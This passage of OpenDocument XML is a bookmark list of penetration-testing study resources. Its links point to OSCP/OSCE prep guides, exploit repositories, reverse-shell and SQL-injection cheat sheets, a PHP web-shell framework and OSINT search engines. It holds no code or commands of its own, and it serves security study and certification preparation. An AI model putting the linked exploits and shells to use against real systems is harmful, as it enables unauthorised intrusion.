      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/buglessdr/oscp-1" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/buglessdr/oscp-1</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/buglessdr/myarsenal" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/buglessdr/myarsenal</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/buglessdr/linux-exploit-suggester" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/buglessdr/linux-exploit-suggester</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/buglessdr/OSCP-2" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/buglessdr/OSCP-2</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/pentestmonkey" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/pentestmonkey</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.peerlyst.com/posts/ctf-virtual-machines-created-by-the-peerlyst-community-hack-these-peerlyst" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.peerlyst.com/posts/ctf-virtual-machines-created-by-the-peerlyst-community-hack-these-peerlyst</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/ston3o/docker-hacklab" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/ston3o/docker-hacklab</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://gist.github.com/jivoi/724e4b4b22501b77ef133edc63eba7b4" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://gist.github.com/jivoi/724e4b4b22501b77ef133edc63eba7b4</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://overthewire.org/wargames/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://overthewire.org/wargames/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/SecWiki/linux-kernel-exploits" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/SecWiki/linux-kernel-exploits</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.pcihispano.com/cumplir-con-pci-dss-solamente-con-software-open-source-es-posible-aqui-te-explicamos-como-hacerlo/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.pcihispano.com/cumplir-con-pci-dss-solamente-con-software-open-source-es-posible-aqui-te-explicamos-como-hacerlo/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://opnsense.org/download/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://opnsense.org/download/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.peerlyst.com/posts/the-red-team-guide-chapter-11-privilege-escalation-haythem-arfaoui?utm_source=peerlyst_perspective&amp;utm_medium=email&amp;utm_content=peerlyst_post&amp;utm_campaign=top_posts_on_peerlyst_this_week_01292019" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.peerlyst.com/posts/the-red-team-guide-chapter-11-privilege-escalation-haythem-arfaoui?utm_source=peerlyst_perspective&amp;utm_medium=email&amp;utm_content=peerlyst_post&amp;utm_campaign=top_posts_on_peerlyst_this_week_01292019</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/thelinuxchoice?tab=repositories" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/thelinuxchoice?tab=repositories</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://pastebin.com/aqGvjhgB" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://pastebin.com/aqGvjhgB</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/osirislab/Hack-Night/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/osirislab/Hack-Night/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://www.opensecuritytraining.info/Exploits1.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.opensecuritytraining.info/Exploits1.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://www.opensecuritytraining.info/Exploits2.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.opensecuritytraining.info/Exploits2.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.bebee.com/producer/@fran-brizzolis/ciberseguridad-en-pymes-administrando-sistemas-de-forma-segura-buenas-practicas" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.bebee.com/producer/@fran-brizzolis/ciberseguridad-en-pymes-administrando-sistemas-de-forma-segura-buenas-practicas</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://picoctf.com/resources" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://picoctf.com/resources</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://blog.osiris.cyber.nyu.edu/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://blog.osiris.cyber.nyu.edu/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.hacker101.com/videos" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.hacker101.com/videos</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://cyb3rsick.com" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://cyb3rsick.com</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/slyth11907/Cheatsheets" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/slyth11907/Cheatsheets</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://pastebin.com/kdc6th08" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://pastebin.com/kdc6th08</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://www.fuzzysecurity.com/index.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.fuzzysecurity.com/index.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://community.infosecinstitute.com/discussion/110760" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://community.infosecinstitute.com/discussion/110760</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.lastline.com/labsblog/unmasking-kernel-exploits/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.lastline.com/labsblog/unmasking-kernel-exploits/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/SecWiki/linux-kernel-exploits" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/SecWiki/linux-kernel-exploits</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.exploit-db.com/papers/42803" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.exploit-db.com/papers/42803</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.exploit-db.com/papers/15823" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.exploit-db.com/papers/15823</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.exploit-db.com/papers/18074" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.exploit-db.com/papers/18074</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/nil0x42/phpsploit" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/nil0x42/phpsploit</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.peerlyst.com/posts/resource-learning-how-to-reverse-malware-a-guide?utm_source=peerlyst_perspective&amp;utm_medium=email&amp;utm_content=peerlyst_post&amp;utm_campaign=special_digest_03032019" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.peerlyst.com/posts/resource-learning-how-to-reverse-malware-a-guide?utm_source=peerlyst_perspective&amp;utm_medium=email&amp;utm_content=peerlyst_post&amp;utm_campaign=special_digest_03032019</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://malware-traffic-analysis.net/2013/11/29/index.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://malware-traffic-analysis.net/2013/11/29/index.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://securedorg.github.io/RE101/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://securedorg.github.io/RE101/</text:a>  Reverse Engineering Malware 101</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://systemoverlord.com/2019/03/15/certifications-arent-as-big-a-deal-as-you-think.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://systemoverlord.com/2019/03/15/certifications-arent-as-big-a-deal-as-you-think.html</text:a>
<text:a xlink:type="simple" xlink:href="https://systemoverlord.com/2017/10/24/building-a-home-lab-for-offensive-security-basics.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://systemoverlord.com/2017/10/24/building-a-home-lab-for-offensive-security-basics.html</text:a>
<text:a xlink:type="simple" xlink:href="https://www.vulnhub.com/lab/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.vulnhub.com/lab/</text:a>
<text:a xlink:type="simple" xlink:href="https://kb.help.rapid7.com/docs/setting-up-a-penetration-testing-lab" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://kb.help.rapid7.com/docs/setting-up-a-penetration-testing-lab</text:a>
<text:a xlink:type="simple" xlink:href="https://amanhardikar.com/mindmaps/Practice.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://amanhardikar.com/mindmaps/Practice.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://systemoverlord.com/2018/10/30/understanding-shellcode-the-reverse-shell.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://systemoverlord.com/2018/10/30/understanding-shellcode-the-reverse-shell.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://ironhackers.es" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://ironhackers.es</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://thehackerway.com/2012/11/20/mi-experiencia-sobre-offensive-security-certified-professional-oscp/#more-2055" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://thehackerway.com/2012/11/20/mi-experiencia-sobre-offensive-security-certified-professional-oscp/#more-2055</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.youtube.com/watch?v=l_1ZtAuCjLk&amp;feature=youtu.be" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.youtube.com/watch?v=l_1ZtAuCjLk&amp;feature=youtu.be</text:a></text:p>
      <text:p text:style-name="Text_20_body">Search engines :</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://censys.io/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://censys.io/</text:a>
<text:a xlink:type="simple" xlink:href="https://www.shodan.io/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.shodan.io/</text:a>
<text:a xlink:type="simple" xlink:href="https://viz.greynoise.io/table" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://viz.greynoise.io/table</text:a>
<text:a xlink:type="simple" xlink:href="https://www.zoomeye.org/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.zoomeye.org/</text:a>
<text:a xlink:type="simple" xlink:href="https://wigle.net/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://wigle.net/</text:a>
<text:a xlink:type="simple" xlink:href="https://publicwww.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://publicwww.com/</text:a>
<text:a xlink:type="simple" xlink:href="https://hunter.io/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://hunter.io/</text:a>
<text:a xlink:type="simple" xlink:href="https://haveibeenpwned.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://haveibeenpwned.com/</text:a>
<text:a xlink:type="simple" xlink:href="https://pipl.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://pipl.com/</text:a>
<text:a xlink:type="simple" xlink:href="https://osintframework.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://osintframework.com/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://www.websecgeeks.com/2017/04/pentesting-nodejs-application-nodejs.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.websecgeeks.com/2017/04/pentesting-nodejs-application-nodejs.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://411hall.github.io/OSCP-Preparation/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://411hall.github.io/OSCP-Preparation/</text:a>
<text:a xlink:type="simple" xlink:href="https://guide.offsecnewbie.com/cherrytree-oscp-template" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://guide.offsecnewbie.com/cherrytree-oscp-template</text:a>
<text:a xlink:type="simple" xlink:href="https://guide.offsecnewbie.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://guide.offsecnewbie.com/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://ethicalredteam.com/oscp.php" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://ethicalredteam.com/oscp.php</text:a>
<text:a xlink:type="simple" xlink:href="https://blackwintersecurity.com/oscp/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://blackwintersecurity.com/oscp/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://dradisframework.com/academy/industry/compliance/oscp/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://dradisframework.com/academy/industry/compliance/oscp/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</text:a>
<text:a xlink:type="simple" xlink:href="http://pentestmonkey.net/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://pentestmonkey.net/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.peerlyst.com/posts/tips-for-an-information-security-analyst-pentester-career-ep-71-web-app-pentesting-practice-mattia-campagnano-13-years-experience-akron-oh?utm_source=peerlyst_perspective&amp;utm_medium=email&amp;utm_content=peerlyst_post&amp;utm_campaign=special_digest_04072019" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.peerlyst.com/posts/tips-for-an-information-security-analyst-pentester-career-ep-71-web-app-pentesting-practice-mattia-campagnano-13-years-experience-akron-oh?utm_source=peerlyst_perspective&amp;utm_medium=email&amp;utm_content=peerlyst_post&amp;utm_campaign=special_digest_04072019</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/besimorhino/powercat" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/besimorhino/powercat</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://justhackerthings.com/post/my-oscp-workflow/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://justhackerthings.com/post/my-oscp-workflow/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://clintonmetu.com/2018/06/how-i-prepared-for-the-pwk-course-and-oscp-exam-oscp-exam-review/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://clintonmetu.com/2018/06/how-i-prepared-for-the-pwk-course-and-oscp-exam-oscp-exam-review/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/codingo/Reconnoitre" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/codingo/Reconnoitre</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://seguridadyredes.wordpress.com/2010/04/05/wireshark-captura-conversaciones-voip-protocolo-sip-sdp-y-rtp-extraccion-de-audio/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://seguridadyredes.wordpress.com/2010/04/05/wireshark-captura-conversaciones-voip-protocolo-sip-sdp-y-rtp-extraccion-de-audio/</text:a></text:p>
      <text:p text:style-name="Text_20_body">wiki con cosas</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://blog.m0noc.com/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://blog.m0noc.com/</text:a></text:p>
      <text:p text:style-name="Text_20_body">CFT <text:a xlink:type="simple" xlink:href="http://www.fc4.me/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://www.fc4.me/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://ctf.sec.army/resources" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://ctf.sec.army/resources</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://pentestlab.blog/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://pentestlab.blog/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://0x09al.github.io/security/ctp/osce/exploitation/2017/07/06/osce-ctp-prep-heapspreay-seh-egghunter.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://0x09al.github.io/security/ctp/osce/exploitation/2017/07/06/osce-ctp-prep-heapspreay-seh-egghunter.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.hacktoday.io/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.hacktoday.io/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.hacktoday.io/t/journey-of-getting-oscp-certificatio/2496" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.hacktoday.io/t/journey-of-getting-oscp-certificatio/2496</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/NeuronAddict/pentesting-notes" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/NeuronAddict/pentesting-notes</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/vitalysim/Awesome-Hacking-Resources" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/vitalysim/Awesome-Hacking-Resources</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/hugsy/gef" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/hugsy/gef</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.offensive-security.com/information-security-training/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.offensive-security.com/information-security-training/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/andyacer/ms08_067" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/andyacer/ms08_067</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/andyacer/pentest" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/andyacer/pentest</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://cexplr.github.io/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://cexplr.github.io/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.shogunlab.com/blog/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.shogunlab.com/blog/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice</text:a></text:p>
      <text:p text:style-name="Horizontal_20_Line"/>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://stacktrac3.co/category/osce-prep/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://stacktrac3.co/category/osce-prep/</text:a>
<text:a xlink:type="simple" xlink:href="https://github.com/s7acktrac3/OSCE-Exploit-Scripts" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/s7acktrac3/OSCE-Exploit-Scripts</text:a>
<text:a xlink:type="simple" xlink:href="https://github.com/s7acktrac3/PHP-Cheatsheet-Script" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/s7acktrac3/PHP-Cheatsheet-Script</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.fuzzysecurity.com/tutorials/expDev/1.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.fuzzysecurity.com/tutorials/expDev/1.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.abatchy.com/2017/03/osce-study-plan" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.abatchy.com/2017/03/osce-study-plan</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/NeuronAddict/pentesting-notes" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/NeuronAddict/pentesting-notes</text:a></text:p>
      <text:p text:style-name="Text_20_body">1.  Censys.io
2.  Shodan.io
3.  Viz.Greynoise.io/table
4.  Zoomeye.org
5.  Fofa.so
6.  Onyphe.io
7.  App.binaryedge.io
8.  Hunter.io
9.  Wigle.net
10. Ghostproject.fr</text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://cybexsec.es/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://cybexsec.es/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/Shiva108/CTF-notes" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/Shiva108/CTF-notes</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/rebe11ion/CTFs/blob/master/HackTheBox-RE.md" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/rebe11ion/CTFs/blob/master/HackTheBox-RE.md</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://0x00sec.org/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://0x00sec.org/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://paumunoz.tech/2018/01/11/reversing-c-code-with-ida-part-i/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://paumunoz.tech/2018/01/11/reversing-c-code-with-ida-part-i/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://aboureada.com/oscp/2017/12/07/oscp_course_layout.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://aboureada.com/oscp/2017/12/07/oscp_course_layout.html</text:a>
<text:a xlink:type="simple" xlink:href="http://aboureada.com/cheat_sheet/2017/12/20/radare2_cheat_sheet.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://aboureada.com/cheat_sheet/2017/12/20/radare2_cheat_sheet.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://aboureada.com/buffer_overflow/2017/12/20/solving-backdoor-echo.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://aboureada.com/buffer_overflow/2017/12/20/solving-backdoor-echo.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="http://aboureada.com/buffer_overflow/2017/12/19/exploiting_protostar_stack4.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">http://aboureada.com/buffer_overflow/2017/12/19/exploiting_protostar_stack4.html</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://paumunoz.tech/2015/06/06/hacking-series-kioptrix-level-2/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://paumunoz.tech/2015/06/06/hacking-series-kioptrix-level-2/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://jhalon.github.io/OSCP-Review/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://jhalon.github.io/OSCP-Review/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://github.com/RustyShackleford221/OSCP-Prep" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://github.com/RustyShackleford221/OSCP-Prep</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://www.jpsecnetworks.com/week-8-oscp-preparation-exploit/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://www.jpsecnetworks.com/week-8-oscp-preparation-exploit/</text:a></text:p>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://honeysec.blogspot.com/2019/05/writeup-challenge-linux-201-by-1r0dm448o.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://honeysec.blogspot.com/2019/05/writeup-challenge-linux-201-by-1r0dm448o.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3T10::36:36</meta:creation-date>
    <dc:creator>Generated</dc:creator>
